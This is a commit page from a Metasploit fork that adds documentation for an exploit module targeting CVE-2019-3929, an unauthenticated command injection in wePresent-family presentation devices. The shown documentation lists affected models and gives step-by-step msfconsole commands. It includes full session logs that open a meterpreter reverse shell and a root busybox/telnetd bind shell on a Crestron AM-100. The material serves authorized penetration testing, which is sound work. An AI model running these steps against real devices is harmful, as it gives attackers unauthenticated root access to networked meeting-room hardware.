adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added exploit module for CVE-2019-3929

Browse Source
This commit is contained in:
Jacob Baines
2020-01-09 08:03:52 -05:00
parent 6cb1feb2a6
commit caa02c7d2e
2 changed files with 209 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/wepresent_cmd_injection.md
+109
View File
@@ -0,0 +1,109 @@
## Vulnerable Application
This module exploits [CVE-2019-3929](https://nvd.nist.gov/vuln/detail/CVE-2019-3929). The vulnerability affects [WePresent](https://www.barco.com/en/page/wepresent) devices, as well as many OEM devices (listed below). The vulnerability is an unauthenticated remote command injection via HTTP POST request to the /cgi-bin/file_transfer.cgi endpoint.
The following devices are known to be affected by this issue:
* Barco wePresent WiPG-1000P <= 2.3.0.10
* Barco wePresent WiPG-1600W <= 2.4.1.19
* Crestron AM-100 <= 1.6.0.2
* Crestron AM-101 <= 2.7.0.1
* Extron ShareLink 200/250 <= 2.0.3.4
* Teq AV IT WIPS710 <= 1.1.0.7
* InFocus LiteShow3 <= 1.0.16
* InFocus LiteShow4 <= 2.0.0.7
* Optoma WPS-Pro <= 1.0.0.5
* Blackbox HD WPS <= 1.0.0.5
* SHARP PN-L703WA <= 1.4.2.3
## Verification Steps
1. Acquire one of the vulnerable devices.
2. Start msfconsole
3. Do: `use exploit/linux/http/wepresent_cmd_injection`
4. Do: `set RHOSTS <device ip>`
5. Do: `check`
6. The module should indicate if the target is vulnerable or not.
7. Do: `set LHOST <ip>`
8. Do: run
9. A meterpreter session should be started
## Options
**RPort**
The RPort is set to 443 by default. While these devices support HTTP over 80 and 443, the file_transfer.cgi endpoint is only available over 443.
**Target**
This module supports two targets: ARCH_CMD and ARCH_ARMLE. The default, ARM_ARMLE, will drop meterpreter on to the target. Whereas the ARCH_CMD target will start a busybox/telnetd bindshell. To switch to the ARCH_ARMLE target use the following command:
```
set target 0
```
## Scenarios
### Tested against Crestron AM-100 1.6.0.2
#### Meterpreter
```
msf5 > use exploit/linux/http/wepresent_cmd_injection
msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246
RHOSTS => 10.12.70.246
msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238
LHOST => 10.12.70.238
msf5 exploit(linux/http/wepresent_cmd_injection) > check
[+] 10.12.70.246:443 - The target is vulnerable.
msf5 exploit(linux/http/wepresent_cmd_injection) > run
[*] Started reverse TCP handler on 10.12.70.238:4444
[*] Command Stager progress - 9.95% done (127/1276 bytes)
[*] Command Stager progress - 19.98% done (255/1276 bytes)
[*] Command Stager progress - 29.94% done (382/1276 bytes)
[*] Command Stager progress - 39.97% done (510/1276 bytes)
[*] Command Stager progress - 50.00% done (638/1276 bytes)
[*] Command Stager progress - 59.95% done (765/1276 bytes)
[*] Command Stager progress - 69.75% done (890/1276 bytes)
[*] Command Stager progress - 79.62% done (1016/1276 bytes)
[*] Command Stager progress - 89.50% done (1142/1276 bytes)
[*] Sending stage (904600 bytes) to 10.12.70.246
[*] Command Stager progress - 100.08% done (1277/1276 bytes)
[*] Command Stager progress - 101.33% done (1293/1276 bytes)
[*] Meterpreter session 1 opened (10.12.70.238:4444 -> 10.12.70.246:40805) at 2020-01-09 05:53:34 -0500
meterpreter > shell
Process 31774 created.
Channel 1 created.
uname -a
Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #30 Wed Jul 12 13:56:45 CST 2017 armv6l GNU/Linux
```
#### Busybox/Telnetd Bind Shell
```
msf5 > use exploit/linux/http/wepresent_cmd_injection
msf5 exploit(linux/http/wepresent_cmd_injection) > set target 0
target => 0
msf5 exploit(linux/http/wepresent_cmd_injection) > set payload cmd/unix/bind_busybox_telnetd
payload => cmd/unix/bind_busybox_telnetd
msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246
RHOSTS => 10.12.70.246
msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238
LHOST => 10.12.70.238
msf5 exploit(linux/http/wepresent_cmd_injection) > check
[+] 10.12.70.246:443 - The target is vulnerable.
msf5 exploit(linux/http/wepresent_cmd_injection) > run
[*] Started bind TCP handler against 10.12.70.246:4444
[*] Command shell session 1 opened (10.12.70.238:41457 -> 10.12.70.246:4444) at 2020-01-09 05:56:36 -0500
whoami
whoami
root
~/boa/cgi-bin # uname -a
uname -a
Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #30 Wed Jul 12 13:56:45 CST 2017 armv6l GNU/Linux
~/boa/cgi-bin #
```